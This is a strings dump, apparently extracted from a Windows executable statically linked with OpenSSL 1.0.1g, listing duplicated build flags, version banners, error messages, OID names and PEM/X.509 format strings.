cl -DOPENSSL_EXPERIMENTAL_JPAKE /MD /Ox /O2 /Ob2 -DOPENSSL_THREADS -DDSO_WIN32 -W3 -Gs0 -GF -Gy -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -D_CRT_SECURE_NO_DEPRECATE -DOPENSSL_EXPERIMENTAL_JPAKE -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DOPENSSL_USE_APPLINK -I. -D_BIND_TO_CURRENT_VCLIBS_VERSION=1 /GS -DOPENSSL_NO_IDEA -DOPENSSL_NO_RC5 -DOPENSSL_NO_MD2 -DOPENSSL_NO_MDC2 -DOPENSSL_NO_KRB5 -DOPENSSL_NO_DYNAMIC_ENGINE
built on: %s
built on: %s
OpenSSL 1.0.1g 7 Apr 2014
OpenSSL 1.0.1g 7 Apr 2014
fips mode not supported
fips mode not supported
MD4 part of OpenSSL 1.0.1g 7 Apr 2014
MD4 part of OpenSSL 1.0.1g 7 Apr 2014
MD5 part of OpenSSL 1.0.1g 7 Apr 2014
MD5 part of OpenSSL 1.0.1g 7 Apr 2014
SHA part of OpenSSL 1.0.1g 7 Apr 2014
SHA part of OpenSSL 1.0.1g 7 Apr 2014
SHA1 part of OpenSSL 1.0.1g 7 Apr 2014
SHA1 part of OpenSSL 1.0.1g 7 Apr 2014
SHA-256 part of OpenSSL 1.0.1g 7 Apr 2014
SHA-256 part of OpenSSL 1.0.1g 7 Apr 2014
SHA-512 part of OpenSSL 1.0.1g 7 Apr 2014
SHA-512 part of OpenSSL 1.0.1g 7 Apr 2014
len>=0 && lenkey)
len>=0 && lenkey)
j key)
j key)
hexkey
hexkey
RIPE-MD160 part of OpenSSL 1.0.1g 7 Apr 2014
RIPE-MD160 part of OpenSSL 1.0.1g 7 Apr 2014
libdes part of OpenSSL 1.0.1g 7 Apr 2014
libdes part of OpenSSL 1.0.1g 7 Apr 2014
DES part of OpenSSL 1.0.1g 7 Apr 2014
DES part of OpenSSL 1.0.1g 7 Apr 2014
des(%s,%s,%s,%s)
des(%s,%s,%s,%s)
!"#$% !"#$%&'()* ,-./0123456789:;?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzRC2 part of OpenSSL 1.0.1g 7 Apr 2014
!"#$% !"#$%&'()* ,-./0123456789:;?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzRC2 part of OpenSSL 1.0.1g 7 Apr 2014
:Blowfish part of OpenSSL 1.0.1g 7 Apr 2014
:Blowfish part of OpenSSL 1.0.1g 7 Apr 2014
CAST part of OpenSSL 1.0.1g 7 Apr 2014
CAST part of OpenSSL 1.0.1g 7 Apr 2014
AES part of OpenSSL 1.0.1g 7 Apr 2014
AES part of OpenSSL 1.0.1g 7 Apr 2014
in && out && key && ivec
in && out && key && ivec
.pp@0
.pp@0
aEÃ
aEÃ
(#EÚ
(#EÚ
ÚE
ÚE
Big Number part of OpenSSL 1.0.1g 7 Apr 2014
Big Number part of OpenSSL 1.0.1g 7 Apr 2014
bn(%d,%d)
bn(%d,%d)
%'%1$=%C%K%O%s%
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
C%C'C3C7C9COCWCiC
RSA part of OpenSSL 1.0.1g 7 Apr 2014
RSA part of OpenSSL 1.0.1g 7 Apr 2014
unsupported signature type
unsupported signature type
unsupported mask parameter
unsupported mask parameter
unsupported mask algorithm
unsupported mask algorithm
rsa operations not supported
rsa operations not supported
operation not supported for this keytype
operation not supported for this keytype
operation not allowed in fips mode
operation not allowed in fips mode
key size too small
key size too small
invalid keybits
invalid keybits
illegal or unsupported padding mode
illegal or unsupported padding mode
digest too big for rsa key
digest too big for rsa key
data too small for key size
data too small for key size
data too large for key size
data too large for key size
RSA_generate_key_ex
RSA_generate_key_ex
RSA_generate_key
RSA_generate_key
RSA_check_key
RSA_check_key
RSA_BUILTIN_KEYGEN
RSA_BUILTIN_KEYGEN
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_VERIFY
PKEY_RSA_VERIFY
PKEY_RSA_SIGN
PKEY_RSA_SIGN
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL
PKEY_RSA_CTRL
Public-Key: (%d bit)
Public-Key: (%d bit)
Private-Key: (%d bit)
Private-Key: (%d bit)
rsa_keygen_pubexp
rsa_keygen_pubexp
rsa_keygen_bits
rsa_keygen_bits
DSA part of OpenSSL 1.0.1g 7 Apr 2014
DSA part of OpenSSL 1.0.1g 7 Apr 2014
priv_key
priv_key
pub_key
pub_key
PKEY_DSA_KEYGEN
PKEY_DSA_KEYGEN
PKEY_DSA_CTRL
PKEY_DSA_CTRL
DSA_generate_key
DSA_generate_key
%s: (%d bit)
%s: (%d bit)
Public-Key
Public-Key
Private-Key
Private-Key
functionality not supported
functionality not supported
WIN32_JOINER
WIN32_JOINER
%s.dll
%s.dll
KERNEL32.DLL
KERNEL32.DLL
.\crypto\dh\dh_key.c
.\crypto\dh\dh_key.c
Diffie-Hellman part of OpenSSL 1.0.1g 7 Apr 2014
Diffie-Hellman part of OpenSSL 1.0.1g 7 Apr 2014
keys not set
keys not set
invalid public key
invalid public key
PKEY_DH_KEYGEN
PKEY_DH_KEYGEN
PKEY_DH_DERIVE
PKEY_DH_DERIVE
GENERATE_KEY
GENERATE_KEY
DH_generate_key
DH_generate_key
DH_compute_key
DH_compute_key
COMPUTE_KEY
COMPUTE_KEY
recommended-private-length: %d bits
recommended-private-length: %d bits
public-key:
public-key:
private-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
PKCS#3 DH Private-Key
EC part of OpenSSL 1.0.1g 7 Apr 2014
EC part of OpenSSL 1.0.1g 7 Apr 2014
unsupported field
unsupported field
passed null parameter
passed null parameter
not a supported NIST prime
not a supported NIST prime
missing private key
missing private key
invalid private key
invalid private key
gf2m not supported
gf2m not supported
PKEY_EC_SIGN
PKEY_EC_SIGN
PKEY_EC_PARAMGEN
PKEY_EC_PARAMGEN
PKEY_EC_KEYGEN
PKEY_EC_KEYGEN
PKEY_EC_DERIVE
PKEY_EC_DERIVE
PKEY_EC_CTRL_STR
PKEY_EC_CTRL_STR
PKEY_EC_CTRL
PKEY_EC_CTRL
o2i_ECPublicKey
o2i_ECPublicKey
i2o_ECPublicKey
i2o_ECPublicKey
i2d_ECPrivateKey
i2d_ECPrivateKey
EC_KEY_set_public_key_affine_coordinates
EC_KEY_set_public_key_affine_coordinates
EC_KEY_print_fp
EC_KEY_print_fp
EC_KEY_print
EC_KEY_print
EC_KEY_new
EC_KEY_new
EC_KEY_generate_key
EC_KEY_generate_key
EC_KEY_copy
EC_KEY_copy
EC_KEY_check_key
EC_KEY_check_key
ECKEY_TYPE2PARAM
ECKEY_TYPE2PARAM
ECKEY_PUB_ENCODE
ECKEY_PUB_ENCODE
ECKEY_PUB_DECODE
ECKEY_PUB_DECODE
ECKEY_PRIV_ENCODE
ECKEY_PRIV_ENCODE
ECKEY_PRIV_DECODE
ECKEY_PRIV_DECODE
ECKEY_PARAM_DECODE
ECKEY_PARAM_DECODE
ECKEY_PARAM2TYPE
ECKEY_PARAM2TYPE
DO_EC_KEY_PRINT
DO_EC_KEY_PRINT
d2i_ECPrivateKey
d2i_ECPrivateKey
EC_PRIVATEKEY
EC_PRIVATEKEY
publicKey
publicKey
privateKey
privateKey
value.implicitlyCA
value.implicitlyCA
value.parameters
value.parameters
value.named_curve
value.named_curve
p.char_two
p.char_two
p.prime
p.prime
p.ppBasis
p.ppBasis
p.tpBasis
p.tpBasis
p.onBasis
p.onBasis
p.other
p.other
.\crypto\ec\ec_key.c
.\crypto\ec\ec_key.c
x%s
x%s
Basis Type: %s
Basis Type: %s
Field Type: %s
Field Type: %s
ASN1 OID: %s
ASN1 OID: %s
ECDH part of OpenSSL 1.0.1g 7 Apr 2014
ECDH part of OpenSSL 1.0.1g 7 Apr 2014
ECDH_compute_key
ECDH_compute_key
ECDSA part of OpenSSL 1.0.1g 7 Apr 2014
ECDSA part of OpenSSL 1.0.1g 7 Apr 2014
bio callback - unknown type (%d)
bio callback - unknown type (%d)
ctrl(%lu) - %s
ctrl(%lu) - %s
gets(%lu) - %s
gets(%lu) - %s
puts() - %s
puts() - %s
write(%d,%lu) - %s
write(%d,%lu) - %s
write(%d,%lu) - %s fd=%d
write(%d,%lu) - %s fd=%d
read(%d,%lu) - %s
read(%d,%lu) - %s
read(%d,%lu) - %s fd=%d
read(%d,%lu) - %s fd=%d
Free - %s
Free - %s
unsupported method
unsupported method
no port specified
no port specified
no port defined
no port defined
no accept port specified
no accept port specified
broken pipe
broken pipe
BIO_get_port
BIO_get_port
%d.%d.%d.%d
%d.%d.%d.%d
%sx -
%sx -
x%c
x%c
x -
x -
https
https
%s:%s
%s:%s
%d.%d.%d.%d:%d
%d.%d.%d.%d:%d
port='
port='
Stack part of OpenSSL 1.0.1g 7 Apr 2014
Stack part of OpenSSL 1.0.1g 7 Apr 2014
lhash part of OpenSSL 1.0.1g 7 Apr 2014
lhash part of OpenSSL 1.0.1g 7 Apr 2014
num_alloc_nodes = %u
num_alloc_nodes = %u
num_nodes = %u
num_nodes = %u
node %6u -> %3u
node %6u -> %3u
load %d.d actual load %d.d
load %d.d actual load %d.d
%lu nodes used out of %u
%lu nodes used out of %u
RAND part of OpenSSL 1.0.1g 7 Apr 2014
RAND part of OpenSSL 1.0.1g 7 Apr 2014
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
passed a null parameter
passed a null parameter
DSO support routines
DSO support routines
x509 certificate routines
x509 certificate routines
error:lX:%s:%s:%s
error:lX:%s:%s:%s
%lu:%s:%s:%d:%s
%lu:%s:%s:%d:%s
Any Extended Key Usage
Any Extended Key Usage
anyExtendedKeyUsage
anyExtendedKeyUsage
supportedAlgorithms
supportedAlgorithms
crossCertificatePair
crossCertificatePair
certificateRevocationList
certificateRevocationList
cACertificate
cACertificate
userCertificate
userCertificate
userPassword
userPassword
supportedApplicationContext
supportedApplicationContext
Microsoft Local Key set
Microsoft Local Key set
LocalKeySet
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
password based MAC
id-PasswordBasedMAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
X509v3 Certificate Issuer
certificateIssuer
certificateIssuer
certicom-arc
certicom-arc
Proxy Certificate Information
Proxy Certificate Information
proxyCertInfo
proxyCertInfo
Microsoft Smartcardlogin
Microsoft Smartcardlogin
msSmartcardLogin
msSmartcardLogin
joint-iso-itu-t
joint-iso-itu-t
JOINT-ISO-ITU-T
JOINT-ISO-ITU-T
set-rootKeyThumb
set-rootKeyThumb
setAttr-Cert
setAttr-Cert
setCext-cCertRequired
setCext-cCertRequired
setCext-certType
setCext-certType
setct-CertResTBE
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBEX
setct-CertReqTBE
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertInqReqTBS
setct-CertResData
setct-CertResData
setct-CertReqTBS
setct-CertReqTBS
setct-CertReqData
setct-CertReqData
setct-PCertResTBS
setct-PCertResTBS
setct-PCertReqData
setct-PCertReqData
setct-AcqCardCodeMsg
setct-AcqCardCodeMsg
certificate extensions
certificate extensions
set-certExt
set-certExt
set-msgExt
set-msgExt
id-ecPublicKey
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-cmc-getCert
id-regInfo-certReq
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-ct-publishCert
id-smime-mod-msg-v3
id-smime-mod-msg-v3
sdsiCertificate
sdsiCertificate
x509Certificate
x509Certificate
localKeyID
localKeyID
certBag
certBag
pkcs8ShroudedKeyBag
pkcs8ShroudedKeyBag
keyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Client Authentication
TLS Web Server Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
X509v3 Extended Key Usage
extendedKeyUsage
extendedKeyUsage
X509v3 Authority Key Identifier
X509v3 Authority Key Identifier
authorityKeyIdentifier
authorityKeyIdentifier
X509v3 Certificate Policies
X509v3 Certificate Policies
certificatePolicies
certificatePolicies
X509v3 Private Key Usage Period
X509v3 Private Key Usage Period
privateKeyUsagePeriod
privateKeyUsagePeriod
X509v3 Key Usage
X509v3 Key Usage
keyUsage
keyUsage
X509v3 Subject Key Identifier
X509v3 Subject Key Identifier
subjectKeyIdentifier
subjectKeyIdentifier
Netscape Certificate Sequence
Netscape Certificate Sequence
nsCertSequence
nsCertSequence
Netscape CA Policy Url
Netscape CA Policy Url
nsCaPolicyUrl
nsCaPolicyUrl
Netscape Renewal Url
Netscape Renewal Url
nsRenewalUrl
nsRenewalUrl
Netscape CA Revocation Url
Netscape CA Revocation Url
nsCaRevocationUrl
nsCaRevocationUrl
Netscape Revocation Url
Netscape Revocation Url
nsRevocationUrl
nsRevocationUrl
Netscape Base Url
Netscape Base Url
nsBaseUrl
nsBaseUrl
Netscape Cert Type
Netscape Cert Type
nsCertType
nsCertType
Netscape Certificate Extension
Netscape Certificate Extension
nsCertExt
nsCertExt
extendedCertificateAttributes
extendedCertificateAttributes
challengePassword
challengePassword
dhKeyAgreement
dhKeyAgreement
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
EVP part of OpenSSL 1.0.1g 7 Apr 2014
EVP part of OpenSSL 1.0.1g 7 Apr 2014
.\crypto\evp\evp_key.c
.\crypto\evp\evp_key.c
nkey
nkey
%s algorithm "%s" unsupported
%s algorithm "%s" unsupported
Public Key
Public Key
Private Key
Private Key
wrong public key type
wrong public key type
unsupported salt type
unsupported salt type
unsupported private key algorithm
unsupported private key algorithm
unsupported prf
unsupported prf
unsupported key size
unsupported key size
unsupported key derivation function
unsupported key derivation function
unsupported keylength
unsupported keylength
unsupported cipher
unsupported cipher
unsupported algorithm
unsupported algorithm
unsuported number of rounds
unsuported number of rounds
public key not rsa
public key not rsa
private key encode error
private key encode error
private key decode error
private key decode error
operaton not initialized
operaton not initialized
no operation set
no operation set
no key set
no key set
method not supported
method not supported
keygen failure
keygen failure
invalid operation
invalid operation
invalid key length
invalid key length
expecting a ec key
expecting a ec key
expecting a ecdsa key
expecting a ecdsa key
expecting a dsa key
expecting a dsa key
expecting a dh key
expecting a dh key
expecting an rsa key
expecting an rsa key
different key types
different key types
ctrl operation not implemented
ctrl operation not implemented
command not supported
command not supported
camellia key setup failed
camellia key setup failed
bn pubkey error
bn pubkey error
bad key length
bad key length
aes key setup failed
aes key setup failed
PKEY_SET_TYPE
PKEY_SET_TYPE
PKCS5_V2_PBKDF2_KEYIVGEN
PKCS5_V2_PBKDF2_KEYIVGEN
PKCS5_v2_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
PKCS5_PBE_keyivgen
PKCS5_PBE_keyivgen
FIPS_CIPHER_CTX_SET_KEY_LENGTH
FIPS_CIPHER_CTX_SET_KEY_LENGTH
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_recover
EVP_PKEY_verify_init
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify
EVP_PKEY_sign_init
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_sign
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_paramgen
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_keygen_init
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_keygen
EVP_PKEY_get1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_get1_EC_KEY
EVP_PKEY_GET1_ECDSA
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DH
EVP_PKEY_get1_DH
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_encrypt
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_init
EVP_PKEY_derive_init
EVP_PKEY_derive
EVP_PKEY_derive
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_decrypt
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl
EVP_PKEY_copy_parameters
EVP_PKEY_copy_parameters
EVP_PKEY2PKCS8_broken
EVP_PKEY2PKCS8_broken
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY
EVP_PKCS82PKEY
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_set_key_length
ECKEY_PKEY2PKCS8
ECKEY_PKEY2PKCS8
ECDSA_PKEY2PKCS8
ECDSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSAPKEY2PKCS8
DSAPKEY2PKCS8
D2I_PKEY
D2I_PKEY
CAMELLIA_INIT_KEY
CAMELLIA_INIT_KEY
AES_INIT_KEY
AES_INIT_KEY
AESNI_INIT_KEY
AESNI_INIT_KEY
.\crypto\evp\evp_pkey.c
.\crypto\evp\evp_pkey.c
EVP_CIPHER_key_length(cipher)
EVP_CIPHER_key_length(cipher)
keylen
keylen
ddddddZ
ddddddZ
ddddddZ
ddddddZ
'() ,-./:=?
'() ,-./:=?
\X
\X
X509_PUBKEY
X509_PUBKEY
public_key
public_key
.\crypto\asn1\x_pubkey.c
.\crypto\asn1\x_pubkey.c
pubkey
pubkey
value.single
value.single
value.set
value.set
cert_info
cert_info
X509_CERT_PAIR
X509_CERT_PAIR
X509_CERT_AUX
X509_CERT_AUX
keyid
keyid
NETSCAPE_CERT_SEQUENCE
NETSCAPE_CERT_SEQUENCE
certs
certs
cert
cert
%8sRequested Extensions:
%8sRequested Extensions:
sa0:00
sa0:00
%8sAttributes:
%8sAttributes:
sUnable to load Public Key
sUnable to load Public Key
sPublic Key Algorithm:
sPublic Key Algorithm:
Subject Public Key Info:
Subject Public Key Info:
Subject:%c
Subject:%c
%8sVersion: %s%lu (%s0x%lx)
%8sVersion: %s%lu (%s0x%lx)
Certificate Request:
Certificate Request:
Public key OCSP hash:
Public key OCSP hash:
%s - d:d:d%.*s %d%s
%s - d:d:d%.*s %d%s
%s - d:d:d %d%s
%s - d:d:d %d%s
Issuer:%c
Issuer:%c
s%s
s%s
%s%lu (%s0x%lx)
%s%lu (%s0x%lx)
%8sVersion: %lu (0x%lx)
%8sVersion: %lu (0x%lx)
Certificate:
Certificate:
%sX
%sX
%*sKey Id:
%*sKey Id:
%*sAlias: %s
%*sAlias: %s
No Revoked Certificates.
No Revoked Certificates.
Revoked Certificates:
Revoked Certificates:
%8sNext Update:
%8sNext Update:
%8sLast Update:
%8sLast Update:
%8sIssuer: %s
%8sIssuer: %s
%8sVersion %lu (0x%lx)
%8sVersion %lu (0x%lx)
Certificate Revocation List (CRL):
Certificate Revocation List (CRL):
%s %s%lu (%s0x%lx)
%s %s%lu (%s0x%lx)
Signature Algorithm: %s
Signature Algorithm: %s
Challenge String: %s
Challenge String: %s
Unable to load public key
Unable to load public key
Public Key Algorithm: %s
Public Key Algorithm: %s
%s (%s)
%s (%s)
Unprocessed type %d
Unprocessed type %d
ERROR: selector [%d] invalid
ERROR: selector [%d] invalid
:EXTERNAL TYPE %s
:EXTERNAL TYPE %s
%*s%s:
%*s%s:
%*s%s OF %s {
%*s%s OF %s {
NETSCAPE_PKEY
NETSCAPE_PKEY
private_key
private_key
NETSCAPE_ENCRYPTED_PKEY
NETSCAPE_ENCRYPTED_PKEY
enckey
enckey
SGCKEYSALT
SGCKEYSALT
Enter Private Key password:
Enter Private Key password:
private-key
private-key
.\crypto\asn1\n_pkey.c
.\crypto\asn1\n_pkey.c
.\crypto\asn1\x_pkey.c
.\crypto\asn1\x_pkey.c
-----END %s-----
-----END %s-----
-----BEGIN %s-----
-----BEGIN %s-----
Content-Transfer-Encoding: base64%s%s
Content-Transfer-Encoding: base64%s%s
name="%s"%s
name="%s"%s
smime-type=%s;
smime-type=%s;
Content-Type: %smime;
Content-Type: %smime;
filename="%s"%s
filename="%s"%s
certs-only
certs-only
%s------%s--%s%s
%s------%s--%s%s
filename="smime.p7s"%s%s
filename="smime.p7s"%s%s
Content-Transfer-Encoding: base64%s
Content-Transfer-Encoding: base64%s
name="smime.p7s"%s
name="smime.p7s"%s
Content-Type: %ssignature;
Content-Type: %ssignature;
%s------%s%s
%s------%s%s
------%s%s
------%s%s
This is an S/MIME signed message%s%s
This is an S/MIME signed message%s%s
"; boundary="----%s"%s%s
"; boundary="----%s"%s%s
protocol="%ssignature";
protocol="%ssignature";
MIME-Version: 1.0%s
MIME-Version: 1.0%s
appl [ %d ]
appl [ %d ]
cont [ %d ]
cont [ %d ]
priv [ %d ]
priv [ %d ]
ASN.1 part of OpenSSL 1.0.1g 7 Apr 2014
ASN.1 part of OpenSSL 1.0.1g 7 Apr 2014
unsupported type
unsupported type
unsupported public key type
unsupported public key type
unsupported encryption algorithm
unsupported encryption algorithm
unsupported any defined by type
unsupported any defined by type
unknown public key type
unknown public key type
unable to decode rsa private key
unable to decode rsa private key
unable to decode rsa key
unable to decode rsa key
streaming not supported
streaming not supported
private key header missing
private key header missing
digest and key type not supported
digest and key type not supported
bad password read
bad password read
X509_PKEY_new
X509_PKEY_new
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY
i2d_PublicKey
i2d_PublicKey
i2d_PrivateKey
i2d_PrivateKey
i2d_EC_PUBKEY
i2d_EC_PUBKEY
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY
d2i_X509_PKEY
d2i_X509_PKEY
d2i_PublicKey
d2i_PublicKey
d2i_PrivateKey
d2i_PrivateKey
d2i_AutoPrivateKey
d2i_AutoPrivateKey
keylength
keylength
keyfunc
keyfunc
PKCS8_PRIV_KEY_INFO
PKCS8_PRIV_KEY_INFO
pkey
pkey
pkeyalg
pkeyalg
EC PRIVATE KEY
EC PRIVATE KEY
DSA PRIVATE KEY
DSA PRIVATE KEY
RSA PRIVATE KEY
RSA PRIVATE KEY
TRUSTED CERTIFICATE
TRUSTED CERTIFICATE
X509 CERTIFICATE
X509 CERTIFICATE
CERTIFICATE
CERTIFICATE
PEM part of OpenSSL 1.0.1g 7 Apr 2014
PEM part of OpenSSL 1.0.1g 7 Apr 2014
phrase is too short, needs to be at least %d chars
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
Enter PEM pass phrase:
CERTIFICATE REQUEST
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
PRIVATE KEY
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
ANY PRIVATE KEY
RSA PUBLIC KEY
RSA PUBLIC KEY
PUBLIC KEY
PUBLIC KEY
unsupported key components
unsupported key components
unsupported encryption
unsupported encryption
read key
read key
public key no rsa
public key no rsa
problems getting password
problems getting password
keyblob too short
keyblob too short
keyblob header parse error
keyblob header parse error
expecting public key blob
expecting public key blob
expecting private key blob
expecting private key blob
error converting private key
error converting private key
PEM_WRITE_PRIVATEKEY
PEM_WRITE_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_PK8PKEY
PEM_PK8PKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
DO_PK8PKEY_FP
DO_PK8PKEY_FP
DO_PK8PKEY
DO_PK8PKEY
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_bio
CERTIFICATE PAIR
CERTIFICATE PAIR
.\crypto\pem\pem_pkey.c
.\crypto\pem\pem_pkey.c
%s PRIVATE KEY
%s PRIVATE KEY
%s PARAMETERS
%s PARAMETERS
/usr/local/ssl/certs
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_DIR
SSL_CERT_FILE
SSL_CERT_FILE
X.509 part of OpenSSL 1.0.1g 7 Apr 2014
X.509 part of OpenSSL 1.0.1g 7 Apr 2014
OPENSSL_ALLOW_PROXY_CERTS
OPENSSL_ALLOW_PROXY_CERTS
unknown key type
unknown key type
unable to get certs public key
unable to get certs public key
public key encode error
public key encode error
public key decode error
public key decode error
no cert set for us to verify
no cert set for us to verify
loading cert dir
loading cert dir
key values mismatch
key values mismatch
key type mismatch
key type mismatch
cert already in hash table
cert already in hash table
cant check dh key
cant check dh key
X509_verify_cert
X509_verify_cert
X509_STORE_add_cert
X509_STORE_add_cert
X509_REQ_check_private_key
X509_REQ_check_private_key
X509_PUBKEY_set
X509_PUBKEY_set
X509_PUBKEY_get
X509_PUBKEY_get
X509_load_cert_file
X509_load_cert_file
X509_load_cert_crl_file
X509_load_cert_crl_file
X509_get_pubkey_parameters
X509_get_pubkey_parameters
X509_check_private_key
X509_check_private_key
GET_CERT_BY_SUBJECT
GET_CERT_BY_SUBJECT
ADD_CERT_DIR
ADD_CERT_DIR
unsupported or invalid name syntax
unsupported or invalid name syntax
unsupported or invalid name constraint syntax
unsupported or invalid name constraint syntax
unsupported name constraint type
unsupported name constraint type
name constraints minimum and maximum not supported
name constraints minimum and maximum not supported
Unsupported extension feature
Unsupported extension feature
invalid or inconsistent certificate policy extension
invalid or inconsistent certificate policy extension
invalid or inconsistent certificate extension
invalid or inconsistent certificate extension
key usage does not include digital signature
key usage does not include digital signature
key usage does not include CRL signing
key usage does not include CRL signing
unable to get CRL issuer certificate
unable to get CRL issuer certificate
key usage does not include certificate signing
key usage does not include certificate signing
authority and subject key identifier mismatch
authority and subject key identifier mismatch
certificate rejected
certificate rejected
certificate not trusted
certificate not trusted
unsupported certificate purpose
unsupported certificate purpose
proxy certificates not allowed, please set the appropriate flag
proxy certificates not allowed, please set the appropriate flag
invalid non-CA certificate (has CA markings)
invalid non-CA certificate (has CA markings)
invalid CA certificate
invalid CA certificate
certificate revoked
certificate revoked
certificate chain too long
certificate chain too long
unable to verify the first certificate
unable to verify the first certificate
unable to get local issuer certificate
unable to get local issuer certificate
self signed certificate in certificate chain
self signed certificate in certificate chain
self signed certificate
self signed certificate
format error in certificate's notAfter field
format error in certificate's notAfter field
format error in certificate's notBefore field
format error in certificate's notBefore field
certificate has expired
certificate has expired
certificate is not yet valid
certificate is not yet valid
certificate signature failure
certificate signature failure
unable to decode issuer public key
unable to decode issuer public key
unable to decrypt certificate's signature
unable to decrypt certificate's signature
unable to get certificate CRL
unable to get certificate CRL
unable to get issuer certificate
unable to get issuer certificate
Load certs from files in a directory
Load certs from files in a directory
%s%clx.%s%d
%s%clx.%s%d
keyCertSign
keyCertSign
Certificate Sign
Certificate Sign
keyAgreement
keyAgreement
Key Agreement
Key Agreement
keyEncipherment
keyEncipherment
Key Encipherment
Key Encipherment
EXTENDED_KEY_USAGE
EXTENDED_KEY_USAGE
%*s
%*s
%*s%s
%*s%s
unsupported option
unsupported option
